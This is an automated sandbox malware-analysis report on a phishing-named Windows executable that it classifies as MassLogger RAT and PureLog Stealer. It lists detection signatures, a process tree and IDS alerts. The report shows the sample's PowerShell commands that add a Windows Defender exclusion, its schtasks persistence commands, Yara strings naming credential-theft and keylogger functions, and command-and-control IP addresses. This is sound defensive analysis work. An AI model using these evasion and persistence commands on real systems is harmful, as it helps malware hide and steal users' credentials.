Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ_PO N89397-GM7287-Order.bat.exe

Overview

General Information

Sample name:RFQ_PO N89397-GM7287-Order.bat.exe
Analysis ID:1564874
MD5:06c13587e9a7af60860cb6e2c4f3a7b2
SHA1:238f5ddcd0193aba7b760b7ab6f3f982d73383b5
SHA256:efd64c0b88bbe45461d13b2a0acd9544218f819f4579af35b5fc92e20d5f6fa5
Tags:exeuser-TeamDreier
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ_PO N89397-GM7287-Order.bat.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe" MD5: 06C13587E9A7AF60860CB6E2C4F3A7B2)
    • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1988 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7640 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 7796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • armsvc.exe (PID: 7848 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: C0525CFD34E032B8DE30555E54329700)
  • alg.exe (PID: 7880 cmdline: C:\Windows\System32\alg.exe MD5: 837DCB726B9BB3B6F4FEF3318B9DEEAD)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7932 cmdline: C:\Windows\system32\AppVClient.exe MD5: A402C4C181FB483490A130C24E7F84A6)
  • FXSSVC.exe (PID: 8028 cmdline: C:\Windows\system32\fxssvc.exe MD5: B184A2D21BE1424241C0CC6F3EE4C667)
  • elevation_service.exe (PID: 8136 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: D2EAE0B17D8ED7CE90F29615B714FC9B)
  • maintenanceservice.exe (PID: 8180 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 644513105C5FAA8D93951A3690E4014C)
  • msdtc.exe (PID: 6332 cmdline: C:\Windows\System32\msdtc.exe MD5: 2AF6C23F4C869205351AA38C5DD66D6E)
  • PerceptionSimulationService.exe (PID: 2688 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 4C2FEBAD6B92DDA4F72130648DB37727)
  • YRtQgzFlDnVSru.exe (PID: 2648 cmdline: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe MD5: 06C13587E9A7AF60860CB6E2C4F3A7B2)
    • schtasks.exe (PID: 7584 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 3628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • perfhost.exe (PID: 2408 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 3A2A9E48FBD06CF338FA403E33134177)
  • Locator.exe (PID: 6388 cmdline: C:\Windows\system32\locator.exe MD5: E970472BE732DDA93E40BA89E643BD45)
  • SensorDataService.exe (PID: 4324 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 02C2C736D5DC9AC9088C92AFC077A118)
  • snmptrap.exe (PID: 4856 cmdline: C:\Windows\System32\snmptrap.exe MD5: F35B03B0A56AB372234FE7A532455C96)
  • Spectrum.exe (PID: 1912 cmdline: C:\Windows\system32\spectrum.exe MD5: EA5AC5AC3ADFDE43933DEF676A6978C0)
  • ssh-agent.exe (PID: 7692 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: D09CFE9983E805B17E25ED1928A06826)
  • TieringEngineService.exe (PID: 1516 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 85B511CA7AB5F39352DEB0D3C0A048DC)
  • AgentService.exe (PID: 7708 cmdline: C:\Windows\system32\AgentService.exe MD5: E46CE79404D95E10B788E99FB6C2C36E)
  • vds.exe (PID: 7724 cmdline: C:\Windows\System32\vds.exe MD5: 0C54A7E73768E6C53E87391113A18ADF)
  • wbengine.exe (PID: 2840 cmdline: "C:\Windows\system32\wbengine.exe" MD5: ADB425AC8592C2AD75F997794106A5E3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2696625029.000000000794C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
      0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x643ae:$a1: get_encryptedPassword
        • 0x64382:$a2: get_encryptedUsername
        • 0x64446:$a3: get_timePasswordChanged
        • 0x6435e:$a4: get_passwordField
        • 0x643c4:$a5: set_encryptedPassword
        • 0x64191:$a7: get_logins
        • 0x6371b:$a8: GetOutlookPasswords
        • 0x62c44:$a9: StartKeylogger
        • 0x615a6:$a10: KeyLoggerEventArgs
        • 0x61575:$a11: KeyLoggerEventArgsEventHandler
        • 0x64265:$a13: _encryptedPassword
        00000000.00000002.1426195581.0000000004A29000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          42.2.vbc.exe.7590f08.3.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            42.2.vbc.exe.7590f08.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              42.2.vbc.exe.7590f08.3.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x22a08:$a1: get_encryptedPassword
              • 0x229dc:$a2: get_encryptedUsername
              • 0x22aa0:$a3: get_timePasswordChanged
              • 0x229b8:$a4: get_passwordField
              • 0x22a1e:$a5: set_encryptedPassword
              • 0x227eb:$a7: get_logins
              • 0x21d75:$a8: GetOutlookPasswords
              • 0x2129e:$a9: StartKeylogger
              • 0x1fc00:$a10: KeyLoggerEventArgs
              • 0x1fbcf:$a11: KeyLoggerEventArgsEventHandler
              • 0x228bf:$a13: _encryptedPassword
              42.2.vbc.exe.8745570.7.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
                42.2.vbc.exe.8745570.7.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 54 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe, ParentProcessId: 7316, ParentProcessName: RFQ_PO N89397-GM7287-Order.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ProcessId: 7548, ProcessName: powershell.exe
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe, ParentProcessId: 7316, ParentProcessName: RFQ_PO N89397-GM7287-Order.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ProcessId: 7548, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe, ParentImage: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe, ParentProcessId: 2648, ParentProcessName: YRtQgzFlDnVSru.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp", ProcessId: 7584, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe, ParentProcessId: 7316, ParentProcessName: RFQ_PO N89397-GM7287-Order.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", ProcessId: 7640, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe, ParentProcessId: 7316, ParentProcessName: RFQ_PO N89397-GM7287-Order.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ProcessId: 7548, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe, ParentProcessId: 7316, ParentProcessName: RFQ_PO N89397-GM7287-Order.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", ProcessId: 7640, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-28T22:44:52.841706+010020516491A Network Trojan was detected192.168.2.7548521.1.1.153UDP
                  2024-11-28T22:44:53.832881+010020516491A Network Trojan was detected192.168.2.7548521.1.1.153UDP
                  2024-11-28T22:44:54.848703+010020516491A Network Trojan was detected192.168.2.7548521.1.1.153UDP
                  2024-11-28T22:44:56.874648+010020516491A Network Trojan was detected192.168.2.7548521.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-28T22:44:49.363972+010020516481A Network Trojan was detected192.168.2.7532511.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-28T22:44:37.090921+010020181411A Network Trojan was detected18.141.10.10780192.168.2.749740TCP
                  2024-11-28T22:46:17.023299+010020181411A Network Trojan was detected47.129.31.21280192.168.2.749922TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-28T22:44:37.090921+010020377711A Network Trojan was detected18.141.10.10780192.168.2.749740TCP
                  2024-11-28T22:46:17.023299+010020377711A Network Trojan was detected47.129.31.21280192.168.2.749922TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-28T22:44:28.600332+010028032742Potentially Bad Traffic192.168.2.749718132.226.247.7380TCP
                  2024-11-28T22:44:41.628617+010028032742Potentially Bad Traffic192.168.2.749754132.226.247.7380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-28T22:44:51.227117+010028508511Malware Command and Control Activity Detected192.168.2.749780172.234.222.13880TCP
                  2024-11-28T22:46:06.959081+010028508511Malware Command and Control Activity Detected192.168.2.74990382.112.184.19780TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Multi AV Scanner detection for submitted file
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeReversingLabs: Detection: 28%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F48286 CryptStringToBinaryA,CryptStringToBinaryA,GetTokenInformation,GetTokenInformation,GetLastError,OpenProcessToken,CloseHandle,GetSidSubAuthorityCount,9_2_00F48286
